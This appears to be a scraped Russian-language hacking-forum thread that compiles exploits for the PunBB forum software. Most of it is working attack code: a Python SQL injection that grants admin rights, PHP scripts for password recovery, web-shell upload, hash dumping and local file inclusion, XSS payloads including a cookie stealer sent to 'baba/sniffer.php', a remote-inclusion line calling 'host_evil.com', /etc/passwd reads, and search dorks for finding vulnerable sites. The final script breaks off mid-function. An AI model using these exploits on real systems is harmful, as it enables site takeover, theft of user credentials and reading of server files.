PunBB <= 1.2.14 Remote Code Execution Exploit (http://milw0rm.com/exploits/3710)
PunBB version <= 1.2.2 Authentication Bypass Exploit (http://milw0rm.com/exploits/901)
ShAnKaR: multiple PHP application poison NULL byte vulnerability (http://marc.info/?l=bugtraq&m=115808642715878&w=2)
PunBB 1.2.4 (change_email) SQL Injection Exploit (http://milw0rm.com/exploits/928)
1.2.11
index.php&req_subject=test&req_message=test"><script>alert(1);</script>
<= 1.2.16(moderate.php)
preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', $_GET['get_host'])) moderate.php?get_host=1.1.1.1<script>alert(1)</script>
<= 1.2.16
moderate.php?get_host=1.1.1.1<script>alert(1)</script>
<= 1.2.15 (message_popup.php) XSS code vulnerability
<?php echo $lang_pms['Popup new'], $return['sender'], $lang_pms['Popup subj'], $return['subject'] ?><br><?php echo $lang_pms['Popup send'], format_time($return['posted']) ?>
<= 1.2.13 SQL Injection
search.php?action=search&keywords=hello&author=&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1&result_list[< UNION SQL QUERY >/*]&1763905137=1&1121320991=1
dork: warning: ini_get has been
Remote File Inclusion in forum PunBB 1.1.2 >> 1.1.5
include/common.php?pun_root=http://www.host_evil.com/cmd?&=id
PunBB <= 1.2.4 - change email to become admin exploit
#!/usr/bin/python
################################################## #####################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#
################################################## #####################
# Proof of concept code from the Hardened-PHP Project
################################################## #####################
#
# -= PunBB 1.2.4 =-
# change_email SQL injection exploit
#
# user-supplied data within the database is still user-supplied data
#
################################################## #####################
import urllib
import getopt
import sys
import string
# Module-level alias of sys.argv; main() uses it only for the argument-count check.
__argv__ = sys.argv
def banner():
    """Print the tool's title and copyright line (Python 2 print statements)."""
    print "PunBB 1.2.4 - change_email SQL injection exploit"
    print "Copyright (C) 2005 Hardened-PHP Project\n"
def usage():
    """Print the banner and option summary, then exit with status -1.

    Never returns; every option (-h, -u, -p, -e, -d) takes one value.
    """
    banner()
    print "Usage:\n"
    print " $ ./punbb_change_email.py [options]\n"
    print " -h http_url url of the punBB forum to exploit"
    print " f.e. http://www.forum.net/punBB/"
    print " -u username punBB forum useraccount"
    print " -p password punBB forum userpassword"
    print " -e email email address where the admin leve activation email is sent"
    print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails"
    print ""
    sys.exit(-1)
def main():
    """Parse options, log in to the forum, then submit the crafted change_email request.

    Calls usage() (which exits) on a getopt error or when argv is too short;
    exits -1 when any of -h/-u/-p/-e/-d is missing and -3 when the login
    response carries no Set-Cookie header. Python 2 code throughout
    (print statements, urllib.URLopener, string.find).
    """
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
    except getopt.GetoptError:
        usage()
    # Coarse length check only; the per-option None checks below are the real validation.
    if len(__argv__) < 10:
        usage()
    username = None
    password = None
    email = None
    domain = None
    host = None
    for o, arg in opts:
        if o == "-h":
            host = arg
        if o == "-u":
            username = arg
        if o == "-p":
            password = arg
        if o == "-e":
            email = arg
        if o == "-d":
            domain = arg
    # Print the banner
    banner()
    # Check that every required option was supplied
    if host == None:
        print "[-] need a host to connect to"
        sys.exit(-1)
    if username == None:
        print "[-] username needed to continue"
        sys.exit(-1)
    if password == None:
        print "[-] password needed to continue"
        sys.exit(-1)
    if email == None:
        print "[-] email address needed to continue"
        sys.exit(-1)
    if domain == None:
        print "[-] catch all domain needed to continue"
        sys.exit(-1)
    # Retrieve the session cookie by posting the login form
    params = {
        'req_username' : username,
        'req_password' : password,
        'form_sent' : 1
    }
    wclient = urllib.URLopener()
    print "[+] Connecting to retrieve cookie"
    req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
    info = req.info()
    if 'set-cookie' not in info:
        print "[-] Unable to retrieve cookie... something is wrong"
        sys.exit(-3)
    cookie = info['set-cookie']
    # Keep only the name=value part of Set-Cookie (drop the attributes after ';').
    cookie = cookie[:string.find(cookie, ';')]
    print "[+] Cookie found - extracting user_id"
    # The cookie value is a URL-encoded serialized PHP array; the text between
    # the first %3A%22 and %22%3B (its first string element) is taken as the user id.
    user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
    print "[+] User-ID: %d" % (int(user_id))
    wclient.addheader('Cookie', cookie);
    # Build the "new email" value: a quoted-local-part address that carries an
    # SQL fragment, space-padded to a fixed 50 characters before the catch-all
    # domain is appended. Per the header note ("user-supplied data within the
    # database is still user-supplied data"), PunBB 1.2.4 presumably reused the
    # stored address in a later query without escaping; the defensive fix is to
    # escape/parameterise at every query, not only at input time.
    email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
    append = 'group_id=\'1'
    email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
    params = {
        'req_new_email' : email,
        'form_sent' : 1
    }
    print "[+] Connecting to request change email"
    req = wclient.open(host + "profile.php?action=change_email&id=" + user_id,
                       urllib.urlencode(params))
    print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
# Script entry point; main() exits via sys.exit() on every error path.
if __name__ == "__main__":
    main()
PunBB BBCode URL Tag Script Injection Vulnerability
www.ut (www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://baba/sniffer.php?c='+document.cookie;this.sss=null`styl e='font-size:0;)'
-punbb_users
--id
--group_id
--username
--password
Dork example:
intext:"Powered by PunBB 1.2.5"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7"
intext:"Powered by PunBB 1.1.0...7" OR "Powered by PunBB 1.2.0...7"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog -inurl:"page=info" -inurl:"page=all" -inurl:"showtopic"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog
Алгоритм шифрования в куках:
md5($cookie_seed.md5(password))
Пример:
md5($cookie_seed.md5("123"))="beae53ed5f767f344b03646a1aa5b16e"
В состав строкового значения входят символы из ряда "abcdef1234567890".
Схема генерации куков:
md5($cookie_seed.$pun_user['password'])
$pun_user['password'] - sha1() или md5() хеш пароль пользователя.
$cookie_seed - соль ("идентична" для всех пользователей).
Дефолтное значение алгоритма для $cookie_seed(config.php):
function pun_hash($str)
{
if (function_exists('sha1')) // Only in PHP 4.3.0+
return sha1($str);
else if (function_exists('mhash')) // Only if Mhash library is loaded
return bin2hex(mhash(MHASH_SHA1, $str));
else return md5($str);
}
PasswordPro не обладает алгоритмом перебора md5(salt.md5(pass)), поэтому будем использовать метод "перебор по маске":
"Набор символов" для пользовательской маски: ?1: abcdef1234567890
Маска: ?1?1?1?1?1?1?1?1202cb962ac59075b964b07152d234b70
Значение длины: 40-40
===
UPDATE: PasswordPro теперь имеет соответствующий модуль
Solide Snake
21.02.2008, 09:33
PunBB <= 1.2.16 Blind Password Recovery Exploit
http://www.milw0rm.com/exploits/5165
<?php
/**
* Original : http://sektioneins.de/advisories/SE-2008-01.txt
* Thanks to Stefan Esser, here's the exploit.
*
* Team : EpiBite
* firefox, petit-poney, thot
* Nous tenons a remercier nos mamans et papas respectifs.
* Let's get a fu*** coffee !
*/
// conf
define('URL', 'http://localhost/punbb_1-2-16_fr/upload'); // base url
define('EMAIL', 'login_x@epitech.net'); // your email
define('LOGIN', 'login_x'); // your login
define('PASS', '620553.8I73'); // your pass
// Exploit
printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL);
$h = curl_init();
curl_setopt($h, CURLOPT_URL,
URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
$s = curl_exec($h);
preg_match('/profile\.php\?id=([0-9]*)">([^<]*)</', $s, $m);
define('ADMIN', $m[2]);
preg_match('/<td class="tcr">([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s, $m);
if (count($m))
define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1]));
else
define('DATE', time() - 86400); //just in case, the forum or account
just has been created
printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
'req_email='.urlencode(EMAIL),
'request_pass=Envoyer')));
preg_match('/mailto:([^"]*)"/', curl_exec($h), $m);
define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically
get, set manually if there's problem)
printf("Admin mail : %s\n--\n", ADMIN_MAIL);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_COOKIE,
'punbb_cookie='.rawurlencode(serialize(array(0 => 2, 1 =>
md5('bite')))));
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
'req_email='.urlencode(ADMIN_MAIL),
'request_pass=Envoyer')));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
$c = unserialize(urldecode($m[1]));
define('MD5_NOT_LOGGUED', $c[1]);
printf("Md5 not loggued : %s\n--\n", MD5_NOT_LOGGUED);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=in');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
'redirect_url=index.php',
'req_username='.LOGIN,
'req_password='.PASS)));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
$c = unserialize(urldecode($m[1]));
define('MD5_LOGGUED', $c[1]);
printf("Md5 loggued : %s\n--\n", MD5_LOGGUED);
define('PASS_MD5ED', sha1(PASS));
$chars = array('/', '-', "\\", '|');
for ($p = 0; $p < 86400 * 2; $p++)
{
if (!($p % 300))
echo $chars[($p / 300) % 4]."\r";
if (strcmp(MD5_LOGGUED, md5(substr(md5((int)(DATE + $p)),
-8).PASS_MD5ED)) == 0)
{
define('SEED', substr(md5(DATE + $p), -8));
break;
}
}
printf("Seed : %s\n--\n", SEED);
for ($p = 0; $p < 1000000; $p++)
{
if (!($p % 300))
echo $chars[($p / 300) % 4]."\r";
mt_srand((double)$p);
if (strcmp(md5(SEED.random_pass(8)), MD5_NOT_LOGGUED) == 0)
{
define('SRAND', $p);
break;
}
}
printf("SRAND : %s\n--\n", SRAND);
mt_srand(SRAND);
random_pass(8);
printf("New password : %s\n--\n", random_pass(8));
$url = URL.'/profile.php?id=2&action=change_pass&key='.random_pass(8);//
Id is set to '2' (the admin's id, but you can change your target)
$h = curl_init();
curl_setopt($h, CURLOPT_URL, $url);
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_exec($h);
// Generate a $len-character string by drawing each character with mt_rand()
// from the alphabet below (presumably a copy of PunBB's own random_pass()).
// Its only entropy is the mt_srand() seed, which is what the search loop above
// recovers; the defensive fix for activation keys and passwords is a CSPRNG
// (random_bytes()/random_int() in PHP 7+), never a seeded mt_rand().
// NOTE(review): the alphabet contains a stray space ("uvw xyz") from the paste,
// so generated values may contain a space.
function random_pass($len)
{
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789';
    $password = '';
    for ($i = 0; $i < $len; ++$i)
        $password .= substr($chars, (mt_rand() % strlen($chars)), 1);
    return $password;
}
# milw0rm.com [2008-02-21]
<?php
# PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitary file upload
# h3ck.[rv.ua], 2008
$host = 'localhost'; # хост
$path = '/punbb/'; # путь к форуму
$file_type = 'image/gif';
$file_name = 'sh1.gif.php'; # название нового файла
$file_code = '<?php phpinfo(); ?>'; # код, который будем выполнять
$cookie = 'punbb_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3 Bi%3A1%3Bs%3A32%3A%220b9ca83006024ac122e2b1c459c08 04f%22%3B%7D'; # без авторизации не будет работать..
$file_content = base64_decode('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==');
$post_data = <<<POST
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="form_sent"
1
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="imagefile"; filename="$file_name"
Content-Type: $file_type
${file_content}${file_code}
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="uploadimg"
Submit
------------9cYrkcaQ3YTUyzCSnL8xD2--
POST;
$post_len = strlen($post_data);
$req = <<<REQ
POST http://${host}${path}uploadimg.php?subpage=upload HTTP/1.0
User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)
Host: $host
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: uk-UA,uk;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Cookie: $cookie
Content-Length: $post_len
Content-Type: multipart/form-data; boundary=----------9cYrkcaQ3YTUyzCSnL8xD2
Connection: Close
$post_data
REQ;
$fp = fsockopen($host, 80, $errno, $errstr, 30);
if (!$fp) { echo "$errstr ($errno)<br />\n"; }
else {
echo "Sending... <pre>$req</pre>\n";
fwrite($fp, $req);
while (!feof($fp)) { echo fgets($fp); }
fclose($fp);
}
?>
baltazar
18.07.2008, 12:48
PunBB Migration Tool 1.4.0
Download URL: http://punbb.er.cz/czmirror/PunBB_Migration_Tool-1.4.0.tar
Bug Type:Local File Inclusion
Bug In: converters/index.php
Vulnerable Code:
<?php // Load a specific page else{ if(file_exists($_GET['page'] . '.php')) include $_GET['page'] . '.php'; else include 'settings.php'; ?>
Proof Of Concept:http://www.website.com/[path]/converters/index.php?page=/etc/passwd%00
v1.2.17 punbb.ru rev87
/message_popup.php
message_popup.php?id=0+UNION+SELECT+user_id,concat _ws(0x3a,table_name),2,3+FROM+INFORMATION_SCHEMA.T ABLES+LIMIT+номер таблицы,1
узнаем префикс по таблицам.
-----------------------------------SQL<
/message_popup.php?id=0+union+select+user_id,userna me,3,password+from+[PREFIX]users+where+id=2
Узнаем имя и хеш админа.
-----------------------------------SQL<
download.php
/download.php?aid=9+union+select+1,file,3,user_id,n ull,1
просматриваем файлы на хосте
-----------------------------------SQL<
user_id - Ваш id на форуме через который вы зашли
By @Fatal@ aka Doom123
<?php
/**
* @author @Fatal@
* @copyright HWT©2008
*
* PunBB expl0it
*
* Уязвимость существует по причине недостаточной обработки
* входящих данных в файле download.php!
*
* Автор не несёт ответственности за использование данного скрипта!
* Используйте его на свой страх и риск!
*
* Уязвимость нашёл @Fatal@.
*/
if (isset($_POST['start']))
{
if (!empty($_POST['login']) && !empty($_POST['pass']) && !empty($_POST['host']) && !empty($_POST['id']) && !empty($_POST['path']))
{
define("_HOST", $_POST['host']);
define("_PORT", 80);
// Collect the name=value part of every Set-Cookie header found in the response
// lines $ans into a single "Cookie: a; b; \r\n" request header line.
// When no Set-Cookie header is present the result is still "Cookie: \r\n", so
// the callers' empty() tests on this value never fire.
function cookie($ans)
{
    $head = 'Cookie:';
    foreach ($ans as $val)
    {
        if (preg_match('#Set-Cookie:(.+)#is', $val, $pock))
        {
            $co = explode(';', $pock['1']);
            $head .= ' ' . trim($co[0]) . ';';
        }
    }
    return $head . " \r\n";
}
// Encode $arr as an application/x-www-form-urlencoded body ("k=v&k2=v2")
// followed by a blank line. Values are urlencode()d, keys are not.
function Prepare_POST_array($arr)
{
    $out = '';
    foreach ($arr as $key => $line)
    {
        if ($out == '')
            $out .= $key . '=' . urlencode($line);
        else
            $out .= '&' . $key . '=' . urlencode($line);
    }
    return $out . "\r\n\r\n";
}
// Send one raw HTTP/1.1 request to _HOST:_PORT (constants defined by the
// caller): a POST of $param, or a GET with an empty body when $param is an
// empty array. $cook is inserted verbatim as a header line.
// Returns the array of response lines, true when $AnswerFlag is false
// (response discarded), or false when the socket could not be opened.
// Content-Length counts the trailing CRLFs that Prepare_POST_array() appends.
// $path comes straight from the submitted form, so the request line is
// attacker-shaped by design here; nothing is validated.
function post_query($path, $param, $cook = '', $AnswerFlag = true)
{
    $out = "POST " . $path . " HTTP/1.1\r\n";
    if ($param == array())
    {
        $out = "GET " . $path . " HTTP/1.1\r\n";
        $data = "";
    } else
        $data = Prepare_POST_array($param);
    $fp = fsockopen(_HOST, _PORT, $errno, $errstr, 30);
    if (!$fp) return false;
    $out .= "Host: " . _HOST . "\r\n";
    $out .= "Content-Type: application/x-www-form-urlencoded; charset=windows-1251\r\n";
    $out .= "Content-Length: " . strlen($data) . "\r\n";
    $out .= "User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)\r\n";
    $out .= $cook;
    $out .= "Connection: Close\r\n\r\n";
    $out .= $data;
    fwrite($fp, $out);
    if ($AnswerFlag)
    {
        while (!feof($fp))
        {
            $answer[] = fgets($fp, 1024);
        }
    } else
        $answer = true;
    fclose($fp);
    return $answer;
}
$array = array(
'form_sent' => '1',
'redirect_url' => 'index.php',
'req_username' => $_POST['login'],
'req_password' => $_POST['pass'],
);
$ans = post_query($_POST['path'].'login.php?action=in', $array);
$a = cookie($ans);
if($_POST['method'] != 2)
{
if (!empty($_POST['nid']))
{
if(empty($a))
$error = 'Не верно введены логин или пароль';
else {
$page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,password,3, '.$_POST['id'].',null,6+FROM+users+WHERE+id+like+'.$_POST['nid'];
$ans2 = post_query($page, array(), $a);
$str = implode('',$ans2);
if(strrpos($str, "doesn't exist (Errno: 1146)") !== false)
{
preg_match("# Table '(.+?)\.users' doesn't exist \(Errno: 1146\)#is",$str,$pock);
$hex = '0x'.bin2hex($pock[1]);
$page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,table_name, 3,'.$_POST['id'].',null,6+FROM+information_schema.columns+WHERE+ta ble_schema+like+'.$hex;
$ans3 = post_query($page, array(), $a);
$str = implode('',$ans3);
preg_match('#PunBB reported</strong>: (.+?)attachments - this file does not exist#is',$str,$pock);
$pref = isset($pock[1]) ? $pock[1] : $_POST['prefix'];
$page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,password,3, '.$_POST['id'].',null,6+FROM+'.$pref.'users+WHERE+id+like+'.$_PO ST['nid'];
$ans2 = post_query($page, array(), $a);
$str = implode('',$ans2);
}
preg_match('#PunBB reported</strong>: (.{0,40}) - this file does not exist#is',$str,$pock);
echo "<center><b><h1>Хеш пользователя:".$pock[1]."</h1></b></center>";
}
} else
$error = "Введите все данные";
} else {
if (!empty($_POST['file']))
{
if(empty($a))
$error = 'Не верно введены логин или пароль';
else {
$page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,"'.$_POST['file'].'",3,'.$_POST['id'].',null,6';
$ans2 = post_query($page, array(), $a);
$i = 11;
while(array_key_exists($i,$ans2))
{
echo htmlspecialchars($ans2[$i]).'<br>';
$i++;
}
}
} else
$error = "ВВедите все данные";
}
} else
$error = "ВВедите все данные";
}
if(isset($error) || !isset($_POST['start']))
{
echo '<center>'.$error."<BR><BR><b>PunBB Expl0it</b><br><br>";
echo '<form method="post">';
echo 'Хост: <input type="text" name="host"><br>';
echo 'Путь: <input type="text" name="path"><br>';
echo 'Префикс: <input type="text" name="prefix"><br>';
echo 'Логин: <input type="text" name="login"><br>';
echo 'Пароль: <input type="text" name="pass"><br>';
echo 'В.id: <input type="text" name="id"><br>';
echo 'Н.id: <input type="text" name="nid"><br>';
echo 'Файл: <input type="text" name="file"><br>';
echo 'Метод: <select name=method><option value=1>Извлечь хэш</option>';
echo '<option value=2>Просмотреть файл</option></select><br>';
echo '<input type="submit" name="start"></form>';
echo '<br><br>В.id - id вашего пользоваетля';
echo '<br>Н.id - id жертвы(Нжно заполнять при первом методе)';
echo '<br>Файл - Путь до файла (При втором методе)';
echo '<br>Путь - Папка форума например /path/ (Если форум не находатся в папке вводим /)';
echo '<br>Префикс - Обычно определяется сам но если не хватает доступа подставляется ваш';
echo '<br><BR><BR>C0ded by @Fatal@ For HW Team</center>';
}
?>
XSS в самой последней версии 1.3RC
http://punbb/1.3/style/Oxygen/Oxygen.php?base_url=Oxygen.css" onload=alert()> <!---&forum_user[style]=1
kremator
30.07.2008, 09:24
PunBB версии до 1.2.19
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и обойти некоторые ограничения безопасности.
1. Уязвимость существует из-за недостаточной обработки входных данных в сценарии include/parser.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
2. Уязвимость существует из-за неизвестной ошибки, которая позволяет удаленному пользователю внедрить произвольные SMTP команды.
~!DoK_tOR!~
12.08.2008, 01:22
видео:
XSS в PunBB 1.x (http://video.antichat.ru/file48.html)
Дефейс сайта через уязвимость в PunBB (php include) (http://video.antichat.ru/file35.html)
Новая уязвимость PunBB (http://video.antichat.ru/file27.html)
http://www.milw0rm.com/exploits/7159
<?php
error_reporting(0);
ini_set("default_socket_timeout",5);
/*
PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit
-----------------------------------------------------------
by athos - staker[at]hotmail[dot]it
download mod http://www.punres.org/files.php?pid=52
download cms http://punbb.org
-----------------------------------------------------------
register_globals = 1
magic_quotes_gpc = 1
Directory (files/include/pms)
functions_navlinks.php?pun_user[language]=../../../../../etc/passwd
profile_send.php?pun_user[language]=../../../../../etc/passwd
viewtopic_PM-link.php?pun_user[language]=../../../../../etc/passwd
../../etc/passwd and nullbyte
File (files/include/pms/functions_navlinks.php)
1. <?php
2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
$pun_user['language'] isn't declared :D you can include any file
functions_navlinks.php?pun_user[language]=../../../etc/passwd%00
-------------------------------------------------------------------
File (files/include/pms/header_new_messages.php)
1. <?php
2. if(!$pun_user['is_guest'] && $pun_user['g_pm'] == 1 && $pun_config['o_pms_enabled'] ){
3. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
$pun_user['g_pm'] isn't declared
$pun_config['o_pms_enabled'] isn't declared
header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=../etc/passd%00
-------------------------------------------------------------------
File (files/include/pms/profile_send.php))
1. <?php
2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
$pun_user['language'] isn't declared
profile_send.php?pun_user[language]=../../../../etc/passwd%00
-------------------------------------------------------------------
File (files/include/pms/viewtopic_PM-link.php)
1. <?php
2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
$pun_user['language'] isn't declared
viewtopic_PM-link.php?pun_user[language]=../../../../etc/passwd%00
-------------------------------------------------------------------
Usage: php [punbb.php] [host/path] [mode]
php [punbb.php] [host/path] [save]
php [punbb.php] [host/path] [NULL]
Example:
php punbb.php localhost/punbb save
php punbb.php localhost/punbb
NOTE: Don't add me on MSN Messenger
*/
$exploit = new Exploit;
$domain = $argv[1];
$mymode = $argv[2];
$exploit->starting();
$exploit->is_vulnerable($domain);
$exploit->exploiting($domain,$mymode);
/**
 * Driver for the 2008 PunBB "Private Messaging System 1.2.x" LFI write-up above.
 * All requests go over a raw TCP socket to port 80. The server-side root cause
 * is register_globals=On letting a request parameter populate
 * $pun_user['language'], which is then concatenated into a require path; the
 * defensive fix is to never build include paths from request data (whitelist
 * language names) and to run with register_globals off (removed in PHP 5.4).
 */
class Exploit
{
    // Send the prepared raw request $data to $host:80 and read the whole reply.
    // Returns on the first loop iteration either way: $array[0] with CRLF if it
    // occurs in the reply, otherwise the full reply text; the remaining status
    // lines are never checked. $content is not initialised before the .= loop.
    // NOTE(review): "SO_BROADC AST" is split by the paste; the `<=` loop bound
    // would also step one past the last element if the loop ever continued.
    function http_request($host,$data)
    {
        if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP))
        {
            echo "socket_create() error!\r\n";
            exit;
        }
        if(!socket_set_option($socket,SOL_SOCKET,SO_BROADC AST,1))
        {
            echo "socket_set_option() error!\r\n";
            exit;
        }
        if(!socket_connect($socket,$host,80))
        {
            echo "socket_connect() error!\r\n";
            exit;
        }
        if(!socket_write($socket,$data,strlen($data)))
        {
            echo "socket_write() errror!\r\n";
            exit;
        }
        while($get = socket_read($socket,1024,PHP_NORMAL_READ))
        {
            $content .= $get;
        }
        socket_close($socket);
        $array = array(
            'HTTP/1.1 404 Not Found',
            'HTTP/1.1 300 Multiple Choices',
            'HTTP/1.1 301 Moved Permanently',
            'HTTP/1.1 302 Found',
            'HTTP/1.1 304 Not Modified',
            'HTTP/1.1 400 Bad Request',
            'HTTP/1.1 401 Unauthorized',
            'HTTP/1.1 402 Payment Required',
            'HTTP/1.1 403 Forbidden',
            'HTTP/1.1 405 Method Not Allowed',
            'HTTP/1.1 406 Not Acceptable',
            'HTTP/1.1 407 Proxy Authentication Required',
            'HTTP/1.1 408 Request Timeout',
            'HTTP/1.1 409 Conflict',
            'HTTP/1.1 410 Gone',
            'HTTP/1.1 411 Length Required',
            'HTTP/1.1 412 Precondition Failed',
            'HTTP/1.1 413 Request Entity Too Large',
            'HTTP/1.1 414 Request-URI Too Long',
            'HTTP/1.1 415 Unsupported Media Type',
            'HTTP/1.1 416 Request Range Not Satisfiable',
            'HTTP/1.1 417 Expectation Failed',
            'HTTP/1.1 Retry With',
        );
        for($i=0;$i<=count($array);$i++)
            if(eregi($array[$i],$content))
            {
                return ("$array[$i]\r\n");
                break;
            }
            else
            {
                return ("$content\r\n");
                break;
            }
    }

    // Pre-check: requests profile_send.php with a lone %27 as pun_user[language].
    // If the reply contains the quote escaped as \' the target is escaping input
    // (magic_quotes_gpc on) and the script prints a message and exits.
    // Otherwise returns false -- despite the name, false here means "continue".
    function is_vulnerable($host)
    {
        $host = explode('/',$host);
        $header .= "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1\r\n";
        $header .= "Host: $host[0]\r\n";
        $header .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
        $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $header .= "Accept-Language: en-us,en;q=0.5\r\n";
        $header .= "Accept-Encoding: gzip,deflate\r\n";
        $header .= "Connection: close\r\n\r\n";
        if(stristr($this->http_request($host[0],$header),"\\'"))
        {
            echo "[+] Magic Quotes GPC/Register Globals On!\n";
            echo "[+] Exploit Failed!\n";
            exit;
        }
        else
        {
            return false;
        }
    }

    // Print usage and exit when the first argument is missing or looks like a
    // full URL. NOTE(review): the pattern '/http://(.+?)$/' reuses its '/'
    // delimiter unescaped, so preg_match presumably returns false (the warning
    // is hidden by error_reporting(0)); only the empty($argv[1]) test is
    // likely to trigger this branch.
    function starting()
    {
        global $argv;
        if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1]))
        {
            echo "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit\r\n";
            echo "[+] by athos - staker[at]hotmail[dot]it\r\n";
            echo " -----------------------------------------------------------\r\n";
            echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n";
            echo "[+] Usage: php $argv[0] [host/path] [save]\r\n";
            echo "[+] Usage: php $argv[0] [host/path] \r\n";
            exit;
        }
    }

    // Read a local file path from stdin, issue one GET against the first
    // candidate script and either echo the reply or, in "save" mode, write it
    // to a random-named .txt in the CWD. Only $array[0] is ever requested: $i
    // is still 0 when the request line is built, and the $i++ branch on a
    // "No such file or directory" reply falls through without retrying.
    // fclose() is handed fwrite()'s return value rather than the handle, so the
    // output file is never explicitly closed.
    function exploiting($host,$mode)
    {
        $host = explode('/',$host);
        $i = 0;
        echo "[+] Local File (ex: ../../etc/passwd%00)\r\n";
        echo "[+] Local File: ";
        $file = stripslashes(trim(fgets(STDIN)));
        if(empty($file)) die("you fail");
        $array = array (
            "functions_navlinks.php?pun_user[language]=$file",
            "profile_send.php?pun_user[language]=$file",
            "viewtopic_PM-link.php?pun_user[language]=$file",
            "header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file",
        );
        $write .= "GET /$host[1]/files/include/pms/$array[$i] HTTP/1.1\r\n";
        $write .= "Host: $host[0]\r\n";
        $write .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
        $write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $write .= "Accept-Language: en-us,en;q=0.5\r\n";
        $write .= "Accept-Encoding: gzip,deflate\r\n";
        $write .= "Connection: close\r\n\r\n";
        if(stristr($this->http_request($host[0],$write),'No such file or directory in'))
        {
            $i++;
        }
        else
        {
            if($mode == "save")
            {
                $rand = rand(0,99999);
